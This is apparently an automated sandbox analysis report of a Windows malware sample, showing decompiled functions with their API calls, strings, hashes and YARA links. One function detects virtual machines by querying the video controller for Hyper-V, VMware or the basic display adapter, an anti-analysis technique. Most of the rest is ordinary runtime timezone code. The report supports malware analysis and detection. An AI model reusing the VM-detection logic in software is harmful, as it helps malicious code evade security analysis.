H, xrefs: 004C22B3

Memory Dump Source

Source File: 00000002.00000001.219606461.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.220624239.00000000004F0000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: d95a3963b6923a39c3ee36a4758d179d0a1a6ae2e2317d8aee999fcc6204156c
Instruction ID: eb7d56441f1e7b20ef5340d7ba0ab152a2973ed329dca8df0a0fa19fdb2e889e
Opcode Fuzzy Hash: d95a3963b6923a39c3ee36a4758d179d0a1a6ae2e2317d8aee999fcc6204156c
Instruction Fuzzy Hash: D3A1393AA041449FDF19DF78D891BAE7BA19F06324F18015EE801DF3A2CBB99D12C759

Uniqueness

Uniqueness Score: -1.00%

Function 0043879C, Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 118
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E0043879C(void* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				char _v12;
				char _v32;
				void* _v36;
				void* _v40;
				char _v44;
				void* _v48;
				WCHAR* _v64;
				WCHAR* _v68;
				WCHAR* _v72;
				char _v76;
				intOrPtr* _v88;
				intOrPtr* _v96;
				signed int _t38;
				void* _t40;
				intOrPtr* _t45;
				intOrPtr* _t52;
				intOrPtr* _t54;
				WCHAR* _t58;
				intOrPtr* _t61;
				intOrPtr* _t73;
				intOrPtr* _t75;
				intOrPtr* _t76;
				char _t91;
				signed int _t94;

				_t96 = (_t94 & 0xfffffff8) - 0x28;
				_t38 =  *0x4eb018; // 0xa3bb88a6
				_v8 = _t38 ^ (_t94 & 0xfffffff8) - 0x00000028;
				_t91 = 0;
				_push(__ecx);
				_v36 = 0;
				_v32 = 0;
				_v40 = 0;
				_t40 = E0043F5AD( &_v36,  &_v32);
				_pop(_t67);
				if(_t40 != 0) {
					_push( &_v40);
					if(E0043F667( &_v32) != 0) {
						_t73 = _v40;
						_v44 = 0;
						_v12 = 0;
						if(_t73 != 0) {
							while(1) {
								 *((intOrPtr*)( *_t73 + 0x10))(_t73, 0xffffffff, 1,  &_v44,  &_v12);
								if(_v32 == _t91) {
									goto L14;
								}
								_t52 = _v64;
								_push(_t91);
								_push(_t91);
								_push( &_v48);
								_push(_t91);
								_push(L"Caption");
								_push(_t52); // executed
								if( *((intOrPtr*)( *_t52 + 0x10))() < 0) {
									L11:
									_t54 = _v88;
									 *((intOrPtr*)( *_t54 + 8))(_t54);
									_t73 = _v88;
									if(_t73 != 0) {
										continue;
									} else {
									}
								} else {
									if(_v72 != 8) {
										L10:
										 *0x4ed604( &_v72);
										goto L11;
									} else {
										_t58 = StrStrIW(_v64, L"Hyper-V"); // executed
										if(_t58 != 0 || StrStrIW(_v68, L"Microsoft Basic Display Adapter") != 0 || StrStrIW(_v72, L"VMWare") != 0) {
											 *0x4ed604( &_v76);
											_t61 = _v96;
											 *((intOrPtr*)( *_t61 + 8))(_t61);
											_t91 = 1;
										} else {
											goto L10;
										}
									}
								}
								goto L14;
							}
						}
						L14:
						_t45 = _v36;
						 *((intOrPtr*)( *_t45 + 8))(_t45);
						_t75 = _v36;
						 *((intOrPtr*)( *_t75 + 8))(_t75);
						_t76 = _v48;
						 *((intOrPtr*)( *_t76 + 8))(_t76);
						 *0x4ed810(); // executed
					}
				}
				return E0049CE1D(_v8 ^ _t96);
			}

0x004387a2
0x004387a5
0x004387ac
0x004387b2
0x004387b8
0x004387bd
0x004387c1
0x004387c5
0x004387c9
0x004387ce
0x004387d1
0x004387dc
0x004387ee
0x004387f4
0x004387f8
0x004387fc
0x00438802
0x0043880e
0x0043881f
0x00438826
0x00000000
0x00000000
0x0043882c
0x00438834
0x00438835
0x00438836
0x00438839
0x0043883a
0x0043883f
0x00438845
0x00438887
0x00438887
0x0043888e
0x00438891
0x00438897
0x00000000
0x00000000
0x0043889d
0x00438847
0x0043884d
0x0043887c
0x00438881
0x00000000
0x0043884f
0x00438858
0x0043885c
0x004388a4
0x004388aa
0x004388b1
0x004388b6
0x00000000
0x00000000
0x00000000
0x0043885c
0x0043884d
0x00000000
0x00438845
0x0043880e
0x004388b7
0x004388b7
0x004388be
0x004388c1
0x004388c8
0x004388cb
0x004388d2
0x004388d5
0x004388d5
0x004387ee
0x004388ed

APIs

Part of subcall function 0043F5AD: SysAllocString.OLEAUT32(ROOT\CIMV2), ref: 0043F5FC
Part of subcall function 0043F5AD: SysFreeString.OLEAUT32(00000000), ref: 0043F621

Part of subcall function 0043F667: SysAllocString.OLEAUT32(WQL), ref: 0043F67F
Part of subcall function 0043F667: SysAllocString.OLEAUT32(SELECT * FROM Win32_VideoController), ref: 0043F688
Part of subcall function 0043F667: SysFreeString.OLEAUT32(00000000), ref: 0043F6D2
Part of subcall function 0043F667: SysFreeString.OLEAUT32(00000000), ref: 0043F6DD

StrStrIW.SHLWAPI(?,Hyper-V), ref: 00438858
StrStrIW.SHLWAPI(?,Microsoft Basic Display Adapter), ref: 00438867
StrStrIW.SHLWAPI(?,VMWare), ref: 00438876
VariantClear.OLEAUT32(00000008), ref: 00438881
VariantClear.OLEAUT32(00000008), ref: 004388A4

Strings

Caption, xrefs: 0043883A
Microsoft Basic Display Adapter, xrefs: 0043885E
VMWare, xrefs: 0043886D
Hyper-V, xrefs: 0043884F

Memory Dump Source

Source File: 00000002.00000002.482426794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.482704528.00000000004F0000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: String$AllocFree$ClearVariant
String ID: Caption$Hyper-V$Microsoft Basic Display Adapter$VMWare
API String ID: 261499160-2601875369
Opcode ID: b954a7e0e0a7886b4ade209102527ca93faec4aa3c3b4ac8daae5b98ffce4332
Instruction ID: cad59449631d3d9305af6ef8d900ebbb3397a1077be9872861ffa1e9e56699b9
Opcode Fuzzy Hash: b954a7e0e0a7886b4ade209102527ca93faec4aa3c3b4ac8daae5b98ffce4332
Instruction Fuzzy Hash: 7E417C71608302AFC708EF25C884D5BBBE8EFC8754F104A6EF55997260DB30D949CB96

Uniqueness

Uniqueness Score: -1.00%

Function 0043834E, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 59
registryCOMMON

Download Yara Rule

C-Code - Quality: 41%

			E0043834E(void* __ebx) {
				signed int _v8;
				int _v12;
				char _v16;
				char _v20;
				int _v24;
				void* _v28;
				signed int _t17;
				void* _t19;
				long _t21;
				long _t28;
				signed int _t38;

				_t17 =  *0x4eb018; // 0xa3bb88a6
				_v8 = _t17 ^ _t38;
				_t19 =  *0x4ed67c(0x1000); // executed
				if(_t19 == 0) {
					_v28 = 0;
					_t21 = RegOpenKeyExW(0x80000002, L"SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\", 0, 0x20019,  &_v28); // executed
					if(_t21 == 0) {
						_v12 = 4;
						_t28 = RegQueryValueExW(_v28, L"GlassSessionId", 0,  &_v24,  &_v20,  &_v12); // executed
						if(_t28 == 0) {
							_push( &_v16);
							_push(GetCurrentProcessId());
							if( *0x4f0098() != 0) {
							}
						}
					}
					if(_v28 != 0) {
						RegCloseKey(_v28); // executed
					}
					goto L8;
				} else {
					L8:
					return L0049CE1D(_v8 ^ _t38);
				}
			}

0x00438354
0x0043835b
0x00438366
0x0043836e
0x00438376
0x0043838a
0x00438392
0x00438397
0x004383b0
0x004383b8
0x004383bd
0x004383c4
0x004383cd
0x004383cd
0x004383cd
0x004383b8
0x004383de
0x004383e3
0x004383e3
0x00000000
0x00438370
0x004383e9
0x004383f7
0x004383f7

APIs

KiUserCallbackDispatcher.NTDLL(00001000), ref: 00438366
RegOpenKeyExW.KERNEL32(80000002,SYSTEM\CurrentControlSet\Control\Terminal Server\,00000000,00020019,?), ref: 0043838A
RegQueryValueExW.KERNEL32(?,GlassSessionId,00000000,?,?,?), ref: 004383B0
GetCurrentProcessId.KERNEL32(?), ref: 004383BE
ProcessIdToSessionId.KERNEL32(00000000), ref: 004383C5
RegCloseKey.KERNEL32(00000000), ref: 004383E3

Strings

SYSTEM\CurrentControlSet\Control\Terminal Server\, xrefs: 00438380
I, xrefs: 004383E3
GlassSessionId, xrefs: 004383A8

Memory Dump Source

Source File: 00000002.00000001.219606461.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.220624239.00000000004F0000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: Process$CallbackCloseCurrentDispatcherOpenQuerySessionUserValue
String ID: I$GlassSessionId$SYSTEM\CurrentControlSet\Control\Terminal Server\
API String ID: 569042397-1620028656
Opcode ID: 27b7b9c2dc77d4a068ed236221e8214ada6d936f26874cf2242a83efc8ec27de
Instruction ID: 1375888261e42abcb995ea69a1410071a9ea076cd39f03993a4a07d28be19a00
Opcode Fuzzy Hash: 27b7b9c2dc77d4a068ed236221e8214ada6d936f26874cf2242a83efc8ec27de
Instruction Fuzzy Hash: 8A113D75A00209AFDB00DFA4DCC9ABFBBBCEB08744F50006ABA02E6251DB749944CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0043834E, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 59
registryCOMMON

Download Yara Rule

C-Code - Quality: 41%

			E0043834E(void* __ebx) {
				signed int _v8;
				int _v12;
				char _v16;
				char _v20;
				int _v24;
				void* _v28;
				signed int _t17;
				void* _t19;
				long _t21;
				long _t28;
				signed int _t38;

				_t17 =  *0x4eb018; // 0xa3bb88a6
				_v8 = _t17 ^ _t38;
				_t19 =  *0x4ed67c(0x1000); // executed
				if(_t19 == 0) {
					_v28 = 0;
					_t21 = RegOpenKeyExW(0x80000002, L"SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\", 0, 0x20019,  &_v28); // executed
					if(_t21 == 0) {
						_v12 = 4;
						_t28 = RegQueryValueExW(_v28, L"GlassSessionId", 0,  &_v24,  &_v20,  &_v12); // executed
						if(_t28 == 0) {
							_push( &_v16);
							_push(GetCurrentProcessId());
							if( *0x4f0098() != 0) {
							}
						}
					}
					if(_v28 != 0) {
						RegCloseKey(_v28); // executed
					}
					goto L8;
				} else {
					L8:
					return E0049CE1D(_v8 ^ _t38);
				}
			}

APIs

KiUserCallbackDispatcher.NTDLL(00001000), ref: 00438366
RegOpenKeyExW.KERNEL32(80000002,SYSTEM\CurrentControlSet\Control\Terminal Server\,00000000,00020019,?), ref: 0043838A
RegQueryValueExW.KERNEL32(?,GlassSessionId,00000000,?,?,?), ref: 004383B0
GetCurrentProcessId.KERNEL32(?), ref: 004383BE
ProcessIdToSessionId.KERNEL32(00000000), ref: 004383C5
RegCloseKey.KERNEL32(00000000), ref: 004383E3

Strings

GlassSessionId, xrefs: 004383A8
SYSTEM\CurrentControlSet\Control\Terminal Server\, xrefs: 00438380

Memory Dump Source

Source File: 00000002.00000002.482426794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.482704528.00000000004F0000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Process$CallbackCloseCurrentDispatcherOpenQuerySessionUserValue
String ID: GlassSessionId$SYSTEM\CurrentControlSet\Control\Terminal Server\
API String ID: 569042397-2312460866
Opcode ID: 27b7b9c2dc77d4a068ed236221e8214ada6d936f26874cf2242a83efc8ec27de
Instruction ID: 1375888261e42abcb995ea69a1410071a9ea076cd39f03993a4a07d28be19a00
Opcode Fuzzy Hash: 27b7b9c2dc77d4a068ed236221e8214ada6d936f26874cf2242a83efc8ec27de
Instruction Fuzzy Hash: 8A113D75A00209AFDB00DFA4DCC9ABFBBBCEB08744F50006ABA02E6251DB749944CB58

Uniqueness

Uniqueness Score: -1.00%

Function 004BA1EE, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 171
timeCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E004BA1EE(void* __ebx, void* __edi, void* __esi) {
				int _v8;
				int _v12;
				int _v16;
				int _v20;
				signed int _v56;
				char _v268;
				intOrPtr _v272;
				char _v276;
				char _v312;
				char _v316;
				void* __ebp;
				void* _t36;
				signed int _t38;
				signed int _t42;
				signed int _t50;
				void* _t54;
				void* _t56;
				long _t58;
				signed int* _t61;
				intOrPtr _t71;
				void* _t78;
				signed int _t85;
				signed int _t87;
				signed int _t89;
				int _t93;
				char** _t96;
				signed int _t100;
				signed int _t101;
				signed int _t106;
				signed int _t107;
				intOrPtr _t115;
				intOrPtr _t117;

				_t88 = __edi;
				_t96 = E004B99E4();
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_t36 = E004B9A42( &_v8);
				_pop(_t78);
				if(_t36 != 0) {
					L19:
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E004A5EA4();
					asm("int3");
					_t106 = _t107;
					_t38 =  *0x4eb018; // 0xa3bb88a6
					_v56 = _t38 ^ _t106;
					 *0x4eb464 =  *0x4eb464 | 0xffffffff;
					 *0x4eb458 =  *0x4eb458 | 0xffffffff;
					_push(0);
					_push(_t96);
					_t77 = "TZ";
					_t89 = 0;
					 *0x4eea10 = 0;
					_t42 = E004AC555(__eflags,  &_v316,  &_v312, 0x100, "TZ");
					__eflags = _t42;
					if(_t42 != 0) {
						__eflags = _t42 - 0x22;
						if(_t42 == 0x22) {
							_t101 = E004B3009(_t78, _v272);
							__eflags = _t101;
							if(__eflags != 0) {
								_t50 = E004AC555(__eflags,  &_v276, _t101, _v272, _t77);
								__eflags = _t50;
								if(_t50 == 0) {
									E004B2FCF(0);
									_t89 = _t101;
								} else {
									_push(_t101);
									goto L25;
								}
							} else {
								_push(0);
								L25:
								E004B2FCF();
							}
						}
					} else {
						_t89 =  &_v268;
					}
					asm("sbb esi, esi");
					_t100 =  ~(_t89 -  &_v268) & _t89;
					__eflags = _t89;
					if(_t89 == 0) {
						L33:
						E004BA1EE(_t77, _t89, _t100); // executed
					} else {
						__eflags =  *_t89;
						if( *_t89 == 0) {
							goto L33;
						} else {
							_push(_t89);
							E004BA019(_t77, _t89, _t100);
						}
					}
					E004B2FCF(_t100);
					__eflags = _v12 ^ _t106;
					return E0049CE1D(_v12 ^ _t106);
				} else {
					_t54 = E004B99EA( &_v12);
					_pop(_t78);
					if(_t54 != 0) {
						goto L19;
					} else {
						_t56 = E004B9A16( &_v16);
						_pop(_t78);
						if(_t56 != 0) {
							goto L19;
						} else {
							E004B2FCF( *0x4eea08);
							 *0x4eea08 = 0;
							 *_t107 = 0x4eea18; // executed
							_t58 = GetTimeZoneInformation(??); // executed
							if(_t58 != 0xffffffff) {
								_t85 =  *0x4eea18 * 0x3c;
								_t87 =  *0x4eea6c; // 0x0
								_push(__edi);
								 *0x4eea10 = 1;
								_v8 = _t85;
								_t115 =  *0x4eea5e; // 0xb
								if(_t115 != 0) {
									_v8 = _t85 + _t87 * 0x3c;
								}
								_t117 =  *0x4eeab2; // 0x3
								if(_t117 == 0) {
									L9:
									_v12 = 0;
									_v16 = 0;
								} else {
									_t71 =  *0x4eeac0; // 0xffffffc4
									if(_t71 == 0) {
										goto L9;
									} else {
										_v12 = 1;
										_v16 = (_t71 - _t87) * 0x3c;
									}
								}
								_t93 = E004AE4AF();
								if(WideCharToMultiByte(_t93, 0, ?str?, 0xffffffff,  *_t96, 0x3f, 0,  &_v20) == 0 || _v20 != 0) {
									 *( *_t96) = 0;
								} else {
									( *_t96)[0x3f] = 0;
								}
								if(WideCharToMultiByte(_t93, 0, ?str?, 0xffffffff, _t96[1], 0x3f, 0,  &_v20) == 0 || _v20 != 0) {
									 *(_t96[1]) = 0;
								} else {
									_t96[1][0x3f] = 0;
								}
							}
							 *(E004B99DE()) = _v8;
							 *(E004B99D2()) = _v12;
							_t61 = E004B99D8();
							 *_t61 = _v16;
							return _t61;
						}
					}
				}
			}

0x004ba1ee
0x004ba1fd
0x004ba204
0x004ba208
0x004ba20b
0x004ba20e
0x004ba213
0x004ba216
0x004ba33e
0x004ba33e
0x004ba33f
0x004ba340
0x004ba341
0x004ba342
0x004ba343
0x004ba348
0x004ba34c
0x004ba354
0x004ba35b
0x004ba35e
0x004ba36b
0x004ba372
0x004ba373
0x004ba375
0x004ba37a
0x004ba389
0x004ba390
0x004ba398
0x004ba39a
0x004ba3a4
0x004ba3a7
0x004ba3b4
0x004ba3b7
0x004ba3b9
0x004ba3d2
0x004ba3da
0x004ba3dc
0x004ba3e2
0x004ba3e7
0x004ba3de
0x004ba3de
0x00000000
0x004ba3de
0x004ba3bb
0x004ba3bb
0x004ba3bc
0x004ba3bc
0x004ba3bc
0x004ba3e9
0x004ba39c
0x004ba39c
0x004ba39c
0x004ba3f6
0x004ba3f8
0x004ba3fa
0x004ba3fc
0x004ba40c
0x004ba40c
0x004ba3fe
0x004ba3fe
0x004ba401
0x00000000
0x004ba403
0x004ba403
0x004ba404
0x004ba409
0x004ba401
0x004ba412
0x004ba41d
0x004ba428
0x004ba21c
0x004ba220
0x004ba225
0x004ba228
0x00000000
0x004ba22e
0x004ba232
0x004ba237
0x004ba23a
0x00000000
0x004ba240
0x004ba246
0x004ba24b
0x004ba251
0x004ba258
0x004ba261
0x004ba267
0x004ba26e
0x004ba274
0x004ba278
0x004ba27e
0x004ba281
0x004ba288
0x004ba28f
0x004ba28f
0x004ba292
0x004ba299
0x004ba2b1
0x004ba2b1
0x004ba2b4
0x004ba29b
0x004ba29b
0x004ba2a2
0x00000000
0x004ba2a4
0x004ba2a6
0x004ba2ac
0x004ba2ac
0x004ba2a2
0x004ba2bc
0x004ba2d8
0x004ba2e8
0x004ba2df
0x004ba2e1
0x004ba2e1
0x004ba306
0x004ba318
0x004ba30d
0x004ba310
0x004ba310
0x004ba306
0x004ba322
0x004ba32c
0x004ba331
0x004ba336
0x004ba33d
0x004ba33d
0x004ba23a
0x004ba228

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,004078B0), ref: 004BA258
WideCharToMultiByte.KERNEL32(00000000,00000000,Pacific Standard Time,000000FF,00000000,0000003F,00000000,?,?), ref: 004BA2D0
WideCharToMultiByte.KERNEL32(00000000,00000000,Pacific Daylight Time,000000FF,?,0000003F,00000000,?), ref: 004BA2FD
_free.LIBCMT ref: 004BA246

Part of subcall function 004B2FCF: RtlFreeHeap.NTDLL(00000000,00000000,?,004BD54B,?,00000000,?,00000000,?,004BD7EF,?,00000007,?,?,004BDBE3,?), ref: 004B2FE5
Part of subcall function 004B2FCF: GetLastError.KERNEL32(?,?,004BD54B,?,00000000,?,00000000,?,004BD7EF,?,00000007,?,?,004BDBE3,?,?), ref: 004B2FF7

_free.LIBCMT ref: 004BA412

Strings

Pacific Daylight Time, xrefs: 004BA2F6
Pacific Standard Time, xrefs: 004BA2C9

Memory Dump Source

Source File: 00000002.00000002.482426794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.482704528.00000000004F0000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
String ID: Pacific Daylight Time$Pacific Standard Time
API String ID: 1286116820-1154798116
Opcode ID: f96e1f1345f5607ad03e7cb585f22dbf5bd1e39733509645ea11963a3bcb89fb
Instruction ID: 04d357e43d8f1236085cb2fae0f105b059e6b35124029796e58893bf4759febd
Opcode Fuzzy Hash: f96e1f1345f5607ad03e7cb585f22dbf5bd1e39733509645ea11963a3bcb89fb
Instruction Fuzzy Hash: 6951F671800259ABCB10EF6A9C859EB77B8EF45310B1046BFE510A7392E7389E518B79

Uniqueness

Uniqueness Score: -1.00%

Function 004BA019, Relevance: 10.9, APIs: 7, Instructions: 370
timeCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E004BA019(void* __ebx, void* __edi, signed int __esi, signed int _a4) {
				signed int _v8;
				signed int _v12;
				int _v16;
				int _v20;
				int _v24;
				char _v52;
				int _v56;
				int _v60;
				signed int _v100;
				char _v272;
				intOrPtr _v276;
				char _v280;
				char _v356;
				char _v360;
				void* __ebp;
				signed int _t65;
				signed int _t72;
				signed int _t74;
				signed int _t78;
				signed int _t85;
				long _t91;
				signed int* _t94;
				signed int _t97;
				signed int _t100;
				signed int _t104;
				void* _t111;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t118;
				void* _t120;
				signed int _t122;
				signed int _t123;
				signed int* _t126;
				signed int _t127;
				void* _t130;
				void* _t132;
				signed int _t133;
				signed int _t135;
				void* _t138;
				intOrPtr _t139;
				void* _t141;
				signed int _t148;
				signed int _t149;
				signed int _t152;
				signed int _t156;
				signed int _t159;
				intOrPtr* _t164;
				signed int _t165;
				intOrPtr* _t166;
				void* _t167;
				intOrPtr _t168;
				void* _t169;
				signed int _t170;
				int _t174;
				signed int _t176;
				char** _t177;
				signed int _t181;
				signed int _t182;
				void* _t189;
				signed int _t190;
				void* _t191;
				signed int _t192;

				_t176 = __esi;
				_t169 = __edi;
				_t65 = L004B99E4();
				_v8 = _v8 & 0x00000000;
				_t135 = _t65;
				_v16 = _v16 & 0x00000000;
				_v12 = _t135;
				if(L004B9A42( &_v8) != 0 || L004B99EA( &_v16) != 0) {
					L46:
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					L004A5EA4(0);
					asm("int3");
					_t189 = _t191;
					_t192 = _t191 - 0x10;
					_push(_t135);
					_t177 = L004B99E4();
					_v52 = 0;
					_v56 = 0;
					_v60 = 0;
					_t72 = L004B9A42( &_v52);
					_t141 = _t176;
					__eflags = _t72;
					if(_t72 != 0) {
						L66:
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						L004A5EA4(_t72);
						asm("int3");
						_push(_t189);
						_t190 = _t192;
						_t74 =  *0x4eb018; // 0xa3bb88a6
						_v100 = _t74 ^ _t190;
						 *0x4eb464 =  *0x4eb464 | 0xffffffff;
						 *0x4eb458 =  *0x4eb458 | 0xffffffff;
						_push(0);
						_push(_t177);
						_push(_t169);
						_t137 = "TZ";
						_t170 = 0;
						 *0x4eea10 = 0;
						_t78 = E004AC555(__eflags,  &_v360,  &_v356, 0x100, "TZ");
						__eflags = _t78;
						if(_t78 != 0) {
							__eflags = _t78 - 0x22;
							if(_t78 == 0x22) {
								_t182 = E004B3009(_t141, _v276);
								__eflags = _t182;
								if(__eflags != 0) {
									_t85 = E004AC555(__eflags,  &_v280, _t182, _v276, _t137);
									__eflags = _t85;
									if(_t85 == 0) {
										E004B2FCF(0);
										_t170 = _t182;
									} else {
										_push(_t182);
										goto L72;
									}
								} else {
									_push(0);
									L72:
									E004B2FCF();
								}
							}
						} else {
							_t170 =  &_v272;
						}
						asm("sbb esi, esi");
						_t181 =  ~(_t170 -  &_v272) & _t170;
						__eflags = _t170;
						if(_t170 == 0) {
							L80:
							L47(); // executed
						} else {
							__eflags =  *_t170;
							if( *_t170 == 0) {
								goto L80;
							} else {
								_push(_t170);
								E004BA019(_t137, _t170, _t181);
							}
						}
						E004B2FCF(_t181);
						__eflags = _v16 ^ _t190;
						return L0049CE1D(_v16 ^ _t190);
					} else {
						_t72 = L004B99EA( &_v16);
						_pop(_t141);
						__eflags = _t72;
						if(_t72 != 0) {
							goto L66;
						} else {
							_t72 = L004B9A16( &_v20);
							_pop(_t141);
							__eflags = _t72;
							if(_t72 != 0) {
								goto L66;
							} else {
								E004B2FCF( *0x4eea08);
								 *0x4eea08 = 0;
								 *_t192 = 0x4eea18; // executed
								_t91 = GetTimeZoneInformation(??); // executed
								__eflags = _t91 - 0xffffffff;
								if(_t91 != 0xffffffff) {
									_t148 =  *0x4eea18 * 0x3c;
									_t165 =  *0x4eea6c; // 0x0
									_push(_t169);
									 *0x4eea10 = 1;
									_v12 = _t148;
									__eflags =  *0x4eea5e; // 0x0
									if(__eflags != 0) {
										_t149 = _t148 + _t165 * 0x3c;
										__eflags = _t149;
										_v12 = _t149;
									}
									__eflags =  *0x4eeab2; // 0x0
									if(__eflags == 0) {
										L56:
										_v16 = 0;
										_v20 = 0;
									} else {
										_t104 =  *0x4eeac0; // 0x0
										__eflags = _t104;
										if(_t104 == 0) {
											goto L56;
										} else {
											_v16 = 1;
											_v20 = (_t104 - _t165) * 0x3c;
										}
									}
									_t174 = E004AE4AF();
									_t97 = WideCharToMultiByte(_t174, 0, 0x4eea1c, 0xffffffff,  *_t177, 0x3f, 0,  &_v24);
									__eflags = _t97;
									if(_t97 == 0) {
										L60:
										 *( *_t177) = 0;
									} else {
										__eflags = _v24;
										if(_v24 != 0) {
											goto L60;
										} else {
											( *_t177)[0x3f] = 0;
										}
									}
									_t100 = WideCharToMultiByte(_t174, 0, 0x4eea70, 0xffffffff, _t177[1], 0x3f, 0,  &_v24);
									__eflags = _t100;
									if(_t100 == 0) {
										L64:
										 *(_t177[1]) = 0;
									} else {
										__eflags = _v24;
										if(_v24 != 0) {
											goto L64;
										} else {
											_t177[1][0x3f] = 0;
										}
									}
								}
								 *(L004B99DE()) = _v12;
								 *((intOrPtr*)(L004B99D2())) = _v16;
								_t94 = L004B99D8();
								 *_t94 = _v20;
								return _t94;
							}
						}
					}
				} else {
					_t166 =  *0x4eea08; // 0x0
					_t176 = _a4;
					if(_t166 == 0) {
						L12:
						E004B2FCF(_t166);
						_t152 = _t176;
						_t12 = _t152 + 1; // 0x4ba40a
						_t167 = _t12;
						do {
							_t111 =  *_t152;
							_t152 = _t152 + 1;
						} while (_t111 != 0);
						_t13 = _t152 - _t167 + 1; // 0x4ba40b
						 *0x4eea08 = E004B3009(_t152 - _t167, _t13);
						_t114 = E004B2FCF(0);
						_t168 =  *0x4eea08; // 0x0
						if(_t168 == 0) {
							goto L45;
						} else {
							_t156 = _t176;
							_push(_t169);
							_t14 = _t156 + 1; // 0x4ba40a
							_t169 = _t14;
							do {
								_t115 =  *_t156;
								_t156 = _t156 + 1;
							} while (_t115 != 0);
							_t15 = _t156 - _t169 + 1; // 0x4ba40b
							_t117 = E004AD3A2(_t168, _t15, _t176);
							_t191 = _t191 + 0xc;
							if(_t117 == 0) {
								_t169 = 3;
								_push(_t169);
								_t118 = L004C18F1(_t157,  *_t135, 0x40, _t176);
								_t191 = _t191 + 0x10;
								if(_t118 == 0) {
									while( *_t176 != 0) {
										_t176 = _t176 + 1;
										_t169 = _t169 - 1;
										if(_t169 != 0) {
											continue;
										}
										break;
									}
									_pop(_t169);
									_t135 = _t135 & 0xffffff00 |  *_t176 == 0x0000002d;
									if(_t135 != 0) {
										_t176 = _t176 + 1;
									}
									_t159 = E004AC2E8(_t157, _t176) * 0xe10;
									_v8 = _t159;
									while(1) {
										_t120 =  *_t176;
										if(_t120 != 0x2b && (_t120 < 0x30 || _t120 > 0x39)) {
											break;
										}
										_t176 = _t176 + 1;
									}
									__eflags =  *_t176 - 0x3a;
									if( *_t176 == 0x3a) {
										_t176 = _t176 + 1;
										_t159 = _v8 + E004AC2E8(_t159, _t176) * 0x3c;
										_v8 = _t159;
										while(1) {
											_t130 =  *_t176;
											__eflags = _t130 - 0x30;
											if(_t130 < 0x30) {
												break;
											}
											__eflags = _t130 - 0x39;
											if(_t130 <= 0x39) {
												_t176 = _t176 + 1;
												__eflags = _t176;
												continue;
											}
											break;
										}
										__eflags =  *_t176 - 0x3a;
										if( *_t176 == 0x3a) {
											_t176 = _t176 + 1;
											_t159 = _v8 + E004AC2E8(_t159, _t176);
											_v8 = _t159;
											while(1) {
												_t132 =  *_t176;
												__eflags = _t132 - 0x30;
												if(_t132 < 0x30) {
													goto L38;
												}
												__eflags = _t132 - 0x39;
												if(_t132 <= 0x39) {
													_t176 = _t176 + 1;
													__eflags = _t176;
													continue;
												}
												goto L38;
											}
										}
									}
									L38:
									__eflags = _t135;
									if(_t135 != 0) {
										_v8 = _t159;
									}
									__eflags =  *_t176;
									_t122 = 0 |  *_t176 != 0x00000000;
									_v16 = _t122;
									__eflags = _t122;
									_t123 = _v12;
									if(_t122 == 0) {
										_t29 = _t123 + 4; // 0xfffffddd
										 *((char*)( *_t29)) = 0;
										L44:
										 *(L004B99DE()) = _v8;
										_t126 = L004B99D2();
										 *_t126 = _v16;
										return _t126;
									}
									_push(3);
									_t28 = _t123 + 4; // 0xfffffddd
									_t127 = L004C18F1(_t159,  *_t28, 0x40, _t176);
									_t191 = _t191 + 0x10;
									__eflags = _t127;
									if(_t127 == 0) {
										goto L44;
									}
								}
							}
							goto L46;
						}
					} else {
						_t164 = _t166;
						_t133 = _t176;
						while(1) {
							_t138 =  *_t133;
							if(_t138 !=  *_t164) {
								break;
							}
							if(_t138 == 0) {
								L8:
								_t114 = 0;
							} else {
								_t9 = _t133 + 1; // 0xdde805eb
								_t139 =  *_t9;
								if(_t139 !=  *((intOrPtr*)(_t164 + 1))) {
									break;
								} else {
									_t133 = _t133 + 2;
									_t164 = _t164 + 2;
									if(_t139 != 0) {
										continue;
									} else {
										goto L8;
									}
								}
							}
							L10:
							if(_t114 == 0) {
								L45:
								return _t114;
							} else {
								_t135 = _v12;
								goto L12;
							}
							goto L82;
						}
						asm("sbb eax, eax");
						_t114 = _t133 | 0x00000001;
						__eflags = _t114;
						goto L10;
					}
				}
				L82:
			}

APIs

_free.LIBCMT ref: 004BA09B
_free.LIBCMT ref: 004BA0BF
_free.LIBCMT ref: 004BA246
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,004078B0), ref: 004BA258
WideCharToMultiByte.KERNEL32(00000000,00000000,004EEA1C,000000FF,00000000,0000003F,00000000,?,?), ref: 004BA2D0
WideCharToMultiByte.KERNEL32(00000000,00000000,004EEA70,000000FF,?,0000003F,00000000,?), ref: 004BA2FD
_free.LIBCMT ref: 004BA412

Memory Dump Source

